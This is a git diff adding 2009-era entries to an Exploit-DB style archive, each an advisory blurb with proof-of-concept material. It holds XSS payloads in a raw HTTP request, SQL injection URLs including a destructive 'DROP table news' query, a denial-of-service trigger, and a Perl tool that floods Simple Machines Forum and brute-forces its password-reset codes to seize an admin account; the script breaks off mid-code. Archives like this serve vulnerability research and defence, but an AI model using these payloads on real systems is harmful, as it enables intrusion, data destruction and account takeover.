diff --git a/files.csv b/files.csv index ef2f2ac58..456318ba4 100755 --- a/files.csv +++ b/files.csv @@ -29460,3 +29460,14 @@ id,file,description,date,author,platform,type,port 32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0 32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 +32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products Unspecified Remote Command Execution Vulnerability",2009-01-07,"Michel Arboi",windows,remote,0 +32712,platforms/multiple/dos/32712.txt,"IBM WebSphere DataPower XML Security Gateway 3.6.1 XS40 Remote Denial Of Service Vulnerability",2009-01-08,Erik,multiple,dos,0 +32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS 'open_book.php' SQL Injection Vulnerability",2009-01-07,stylextra,php,webapps,0 +32714,platforms/php/webapps/32714.txt,"Visuplay CMS Multiple SQL Injection Vulnerabilities",2009-01-12,"Joseph Giron",php,webapps,0 +32715,platforms/php/dos/32715.php,"PHP <= 5.2.8 'popen()' Function Buffer Overflow Vulnerability",2009-01-12,e.wiZz!,php,dos,0 +32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0 +32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0 +32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0 diff --git a/platforms/asp/webapps/32716.html b/platforms/asp/webapps/32716.html new file mode 100755 index 000000000..fce63ec45 --- /dev/null +++ b/platforms/asp/webapps/32716.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33217/info + +Comersus Cart is prone to a vulnerability that can result in unauthorized access. + +An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue may compromise the application. + +Comersus Cart 6 is vulnerable; other versions may also be affected. + +
Name
Last Name
Company
Phone
Email Edit
Password Edit
Address
Zip
State
Non listed state
City
Country
   
\ No newline at end of file diff --git a/platforms/jsp/webapps/32708.txt b/platforms/jsp/webapps/32708.txt new file mode 100755 index 000000000..f465734d1 --- /dev/null +++ b/platforms/jsp/webapps/32708.txt @@ -0,0 +1,37 @@ +source: http://www.securityfocus.com/bid/33153/info + +Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible. + +Versions prior to BusinessManager 4.2 are vulnerable. + +POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1 +Host: or IP +User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) +Gecko/20080718 +Ubuntu/8.04 (hardy) Firefox/2.0.0.16 +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9, +text/plain;q=0.8,image/png,*/*;q=0.5 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Proxy-Connection: keep-alive +Referer: http://www.example.com/pagesUTF8/auftrag_allgemeinauftrag.jsp +Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D +Content-Type: application/x-www-form-urlencoded +Content-Length: 1085 + +TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample& +VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29 +%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14 +&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01& +DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=& +Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E& +LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13& +LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample& +OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2& +REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab= +&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true& +CheckXYZ=Send&yOffsetScroll=0 diff --git a/platforms/jsp/webapps/32709.txt b/platforms/jsp/webapps/32709.txt new file mode 100755 index 000000000..c38e2b28a --- /dev/null +++ b/platforms/jsp/webapps/32709.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33153/info + +Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible. + +Versions prior to BusinessManager 4.2 are vulnerable. + +http://www.example.com/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/ +C-00042/PRM \ No newline at end of file diff --git a/platforms/jsp/webapps/32710.txt b/platforms/jsp/webapps/32710.txt new file mode 100755 index 000000000..02597bbd9 --- /dev/null +++ b/platforms/jsp/webapps/32710.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33153/info + +Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible. + +Versions prior to BusinessManager 4.2 are vulnerable. + +http://www.example.com/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs \ No newline at end of file diff --git a/platforms/multiple/dos/32712.txt b/platforms/multiple/dos/32712.txt new file mode 100755 index 000000000..4b0f33152 --- /dev/null +++ b/platforms/multiple/dos/32712.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/33169/info + +IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. + +Remote attackers can exploit this issue to cause the device to reboot, denying service to legitimate users. + +WebSphere DataPower XML Security Gateway XS40 with firmware 3.6.1.5 is affected; other versions may also be vulnerable. + +The following string is sufficient to trigger this issue: + +?abc? \ No newline at end of file diff --git a/platforms/php/dos/32715.php b/platforms/php/dos/32715.php new file mode 100755 index 000000000..3d991d234 --- /dev/null +++ b/platforms/php/dos/32715.php @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/33216/info + +PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. + +An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users. + +PHP 5.2.8 and prior versions are vulnerable. + +UPDATE (March 4, 2009): Further reports indicate that this issue may not be exploitable as described. We will update this BID pending further investigation. + + diff --git a/platforms/php/webapps/32713.txt b/platforms/php/webapps/32713.txt new file mode 100755 index 000000000..7e443f691 --- /dev/null +++ b/platforms/php/webapps/32713.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/33196/info + +The tadbook2 module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +http://www.example.com/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/* + +http://www.example.com/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/* + +http://www.example.com/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/* \ No newline at end of file diff --git a/platforms/php/webapps/32714.txt b/platforms/php/webapps/32714.txt new file mode 100755 index 000000000..91e63a678 --- /dev/null +++ b/platforms/php/webapps/32714.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33209/info + +Visuplay CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7 \ No newline at end of file diff --git a/platforms/php/webapps/32717.pl b/platforms/php/webapps/32717.pl new file mode 100755 index 000000000..9d639c9ca --- /dev/null +++ b/platforms/php/webapps/32717.pl @@ -0,0 +1,207 @@ +source: http://www.securityfocus.com/bid/33219/info + +Simple Machines Forum is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature. + +An attacker can exploit this issue to gain administrative access to the application, which may allow the attacker to compromise the application; other attacks are also possible. + +Versions up to and including Simple Machines Forum 1.1.7 are vulnerable. + +UPDATE (February 6, 2009): The vendor indicates that this issue was resolved in Simple Machines Forum 1.0.14 and 1.1.6. + +#!/usr/bin/perl + + use LWP::UserAgent; + use Getopt::Std; + use LWP::Simple; + use HTTP::Request; + +#Author: Xianur0 +#Uxmal666[at]gmail.com +# Cracks links Password Recovery +# Find Temporary Files executed by mods +# DB function Flood by Error Log +# File Path Disclosure +# List installed Mods (Useful To Find Mods Vulnerable) +# etc. .. + +print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n"; +my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL] +[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l +Installed Mods List \n-b Find Temporary\n-c Cracks links Password +Recovery (Recommended Use Proxy)"); +version(); +my $proxy = $ARGV[2] || ""; +if($ARGV[0] ne "-c" && $proxy ne "") { +$ua->proxy(["http"], "http://".$proxy); +} + + getopts('fplbc', \%opt); + crackeador() if $opt{c}; + flood() if $opt{f}; + path() if $opt{p}; + list() if $opt{l}; + temp() if $opt{b}; + +sub headers { +$req->header('Accept' => 'text/html'); +$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3'); +} + +sub version { +$ua = LWP::UserAgent->new; +$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) +Gecko/20080201 Firefox/2.0.0.12'); +$req = HTTP::Request->new(GET => $url); +&headers; +$res = $ua->request($req); +if ($res->is_success) { + my $html = $res->content; +if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by +SMF (.*?)<\/a>/){ +$version = $1; +print "\n[X] SMF Version: $version\n"; +if($version < "1.1.7") { +print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X] +http://milw0rm.com/search.php?dong=smf".$version."\n\n"; +} +}}} + +sub path { +$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers'); +&headers; +$res = $ua->request($req); +if ($res->is_success) { + my $html = $res->content; +if ($html =~ /Undefined variable: ssi_layers in (.*?)SSI.php/){ +print "[X] Directory: $1\n"; +} else { print "[!] Getting error Directory!\n";} +} +} + +sub flood { +print "[X] Starting Flood! (Press Ctrl + C To Finish)\n"; +$texto = "Flood!!!!!" x 15; +$req = HTTP::Request->new(GET => +$url.'/index.php?action=help;page['.$texto.']=loginout'); +&headers; +for($i = 1; $i<10000; $i++) { +$res = $ua->request($req); +if ($res->is_success) { +print "[-] Sent: ".$i."\n"; +} else { +print "[!] HTTP Error Query: " . $res->status_line . "\n"; +} +} +} + + +sub temp { +@temps=('index.php~','Settings.php~','Settings_bak.php~'); +foreach $temp (@temps) { +$req = HTTP::Request->new(GET => $url."/".$temp); +&headers; +$res = $ua->request($req); +if ($res->is_success) { +print "[X] Temporary File Found: ".$url."/".$temp."\n"; +} else {print "[!] Not Found: ".$url."/".$temp."\n";} +} +} + +sub list { +$req = HTTP::Request->new(GET => $url."/Packages/installed.list"); +&headers; +$res = $ua->request($req); +if ($res->is_success) { + my $html = $res->content; +my @htmls = split("\n", $html); +foreach $mod (@htmls) { +my @mod = split('\|\^\|', $mod); +print "[X]Package:\nDescription: $mod[0]\nFile: +$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n"; + +} +} +} + +sub crackeador() { +$url = $ARGV[0]; +$nick = $ARGV[1]; +$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID +Admin] [Proxy:Puerto]\nExample: smf.pl -p +http://www.simplemachines.org/community/ dschwab9 179 +www.carlosslim.com:3128\n"); +my $reminder = $url."?action=reminder"; +my $smf = $reminder.";sa=setpassword;u=".$id.";code="; +my $proxy = $ARGV[3]; +if($proxy ne "") { +$ua->proxy(["http"], "http://".$proxy); +} + +sub mail() { +my $content = HTTP::Request->new(GET => $reminder); +$contenedor = $ua->request($content)->as_string; +if ($contenedor =~ /Set-Cookie: (.*?) +/){ + print "\n[+] SESSION Detected: $1\n"; +$session = $1; +} else { die "[!] SESSION could not be found!\n";} +if ($contenedor =~ /new(POST => $reminder.';sa=mail'); + $req->content_type('application/x-www-form-urlencoded'); + $req->content('user='.$nick.'&sc='.$sc.'&=enviar'); + $req->header('Cookie' => $session); +my $res = $ua->request($req)->as_string; +if(!$res) {exit;} +print "[x]Sent!\n"; + +} + +sub generador() { +my $password = ""; +my @chars = split(" ", + "0 1 2 3 4 5 6 7 8 9 a b c d e + f g h i j k l m n o p q r s t + u v w x y z"); +for (my $i=0; $i < 10 ;$i++) { + $_rand = int(rand 35); + $password .= $chars[$_rand]; +} +return $password; +} + +sub brute() { +while($bucle ne "finito") { +$code = generador(); + my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code; + my $content = HTTP::Request->new(GET => $reminder); + my $content = $ua->request($content)->as_string; +if ($content =~ /new(POST => $reminder.';sa=mail'); + $req->content_type('application/x-www-form-urlencoded'); + $req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc); + $req->header('Cookie' => $session); + $res = $ua->request($req); + if ($res->is_success) { + if($res->content =~ '